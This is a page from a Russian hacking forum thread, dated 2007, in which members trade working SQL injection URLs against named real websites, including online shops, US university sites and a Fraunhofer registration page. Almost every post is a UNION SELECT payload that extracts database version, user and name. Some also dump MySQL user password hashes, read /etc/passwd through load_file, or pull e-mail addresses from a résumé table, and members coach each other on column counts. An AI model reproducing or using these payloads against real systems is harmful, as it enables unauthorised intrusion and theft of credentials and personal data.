ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2981  
Старый 29.08.2007, 11:13
Аватар для noisia
noisia
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449

Репутация: 17
По умолчанию

http://www.webkoleso.ru/index.php?pageId=3&comp=22+union+select+1,2,3,4/*
таблицы неподобрал
 
Ответить с цитированием

  #2982  
Старый 29.08.2007, 11:57
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Цитата:
Сообщение от noisia  
http://www.webkoleso.ru/index.php?pageId=3&comp=22+union+select+1,2,3,4/*
таблицы неподобрал
естественно не подберешь -))
колонок то 9 (;
http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,4,5,6,7,8,9/*
сейчас буду дальше искать... Loading [|||||........]

version() - 4.0.26
database() - udb4037
4.0.26:Uwww4037S@localhost

http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(version(),char(58),use r()),database(),6,7,8,9/*

Последний раз редактировалось Calcutta; 29.08.2007 в 12:23..
 
Ответить с цитированием

  #2983  
Старый 29.08.2007, 12:51
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ponchik  
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*
http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,database(),version(),4,5,u ser(),7,8,9,10,11,12,13/
хотел докапаться до базы е-маилов и паролей, не получилось. но походу нада дальше учиться и разбираться... подобрал стандарт.. useless :-\
 
Ответить с цитированием

  #2984  
Старый 29.08.2007, 14:38
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Вот пара .edu c PR 6
Код:
http://www.choices.edu/resources/detail.php?id=-49%20UNION%20SELECT%201,convert(concat_ws(0x3b,version(),user(),database())us

ing%20latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.hum.utah.edu/display.php?&pageId=-2037%20UNION%20SELECT%201,2,3,4,5,6,7,concat(version(),user()),9,10,11/*
 
Ответить с цитированием

  #2985  
Старый 29.08.2007, 14:47
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Цитата:
http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(user,0 x3a,password)+using+latin1),9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 +from+mysql.user
еще так можно
Цитата:
http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-1+union+select+1,2,3,4,5,6,7,load_file('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66
 
Ответить с цитированием

  #2986  
Старый 29.08.2007, 15:20
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://www.sitronics.ru/
Цитата:
?cat_id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,VERSION(),DATABASE (),USER()),3,4+--+
 
Ответить с цитированием

  #2987  
Старый 29.08.2007, 15:46
Аватар для Y.Dmitriy
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

интернет магазин
Цитата:
http://www.kontec.ru/details.php?product_id=-1959+union+select+1,2,3,4,5,6,7,user(),9,version() ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
Цитата:
http://levit.ru/product_info.php?products_id=1734+union+select+1,2/*
Цитата:
http://www.yourstyle.ru/catalog/item.php?i=4475+union+select+1,2,3,4,5,6,7,8,9,10, 11,12/*

Последний раз редактировалось Y.Dmitriy; 29.08.2007 в 16:07..
 
Ответить с цитированием

  #2988  
Старый 29.08.2007, 16:07
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

http://vitesse.ru/
Цитата:
http://vitesse.ru/item.php?g_id=-1+UNION+SELECT+1,2,USER(),DATABASE(),5,VERSION(),7 ,8/*
 
Ответить с цитированием

  #2989  
Старый 29.08.2007, 16:38
Аватар для _GaLs_
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

Код:
http://www.jobpages.ru/findrezum.php?a=2&id_rezum=-705+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,mail,15,16,id_resum,18+from+resum+where+id_resum=705/*
http://www.hardvision.ru/?dir=download&id=2970+union+select+1,2,3,4,5/*
http://1cent.ru/Shops/search_good.php?limit=1&search_descript=yeah%27union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4/*&search_brand=&search_model=&Submit=%C8%F1%EA%E0%F2%FC
http://www.t-turn.com/article.php?sid=-9999999+union+select+1,2,3,user(),5,6,7,8,9+from+authors/*
http://www.ruclimat.ru/sts/view.php?id=0+union+select+1,2,3,4,concat(database(),0x20,user(),0x20,version()),6,7,8,9/*
 
Ответить с цитированием

  #2990  
Старый 29.08.2007, 18:53
Аватар для n3m0
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ponchik  
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*
http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,user(),8,9,10,11 ,12,13/*
Подставляй туда вместо user() - database()
У меня работало
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ